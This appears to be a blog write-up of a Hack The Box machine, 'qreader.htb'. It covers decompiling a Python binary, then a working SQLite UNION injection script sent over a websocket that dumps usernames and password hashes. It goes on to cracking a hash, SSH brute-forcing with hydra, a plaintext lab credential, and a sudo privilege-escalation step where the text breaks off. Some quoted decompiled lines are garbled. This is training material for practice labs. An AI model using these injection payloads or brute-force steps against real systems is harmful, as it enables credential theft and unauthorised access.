Playing Hacks and Stuffs!
Nmap Scan
I added the domain to my /etc/hosts/
After checking the web server
The only function there is that it checks converts a string to a qr code or it decodes a qr code and shows it content
THere’s a given file which can be downloaded
After downloading the file given which turns out to be a zip file i extracted it
And its looks like a python compiled binary
So we can decompile it using uncompyle6 but before that we need to convert it to a pyc file
pyi-archive_viewer qreader
? X qreader
to filename? ./qreader.pyc
Then decompile using uncompyle6
uncompyle6 qreader.pyc >
I encountered issues with this because it works with python3.8 and ever since i updated my linux its been misbehaving
So i used vps (thm attack box) for this
Here’s the vulnerable part of the code
ws_host = 'ws://ws.qreader.htb:5789'
def version(self):
response = + '/version', json.dumps({
'version': VERSION })))
data = json.loads(response)
if 'error' not in data.keys():
version_info = data['message']
msg = f'''[INFO] You have version {version_info['version']} which was released on {version_info['released_date']}'''
return None
error = None['error']
It calls to the web socket hosted on port 5789 and sends the value of version in json format to the /version endpoint
After meeting chatgpt for a script to connect to the ws socket it formed this
from websocket import *
import sys, json
ws_host = 'ws://ws.qreader.htb:5789'
VERSION = '0.0.2'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
Trying that works
➜ Socket python3.10
{"message": {"id": 2, "version": "0.0.2", "released_date": "26/09/2022", "downloads": 720}}
➜ Socket
From here the best thing to try i guess is sql injection
I followed Resource and got that its sqlite injection
From there i got the user table and password table
Here’s the script
from websocket import *
import sys, json
ws_host = 'ws://ws.qreader.htb:5789'
VERSION = '0.0.3" UNION SELECT username,password,3,4 from users-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
VERSION = '0.0.3" UNION SELECT group_concat(answered_by),group_concat(answer),3,4 from answers-- -'
ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
Running that gives the password hash and a user
Using crackstation i got the password value for the hash
Now we have password how about user?
If you notice the name Thomas Keller
we can try get like possible usernames from it
Using a Script, I generated possible usernames
So i then used hydra to brute force usernames for ssh
Now that we have valid cred tkeller:denjanjade122566
lets login to ssh
Lets get root
Checking sudo -l
shows that the user can run /usr/local/sbin/
as root
Here’s the content of /usr/local/sbin/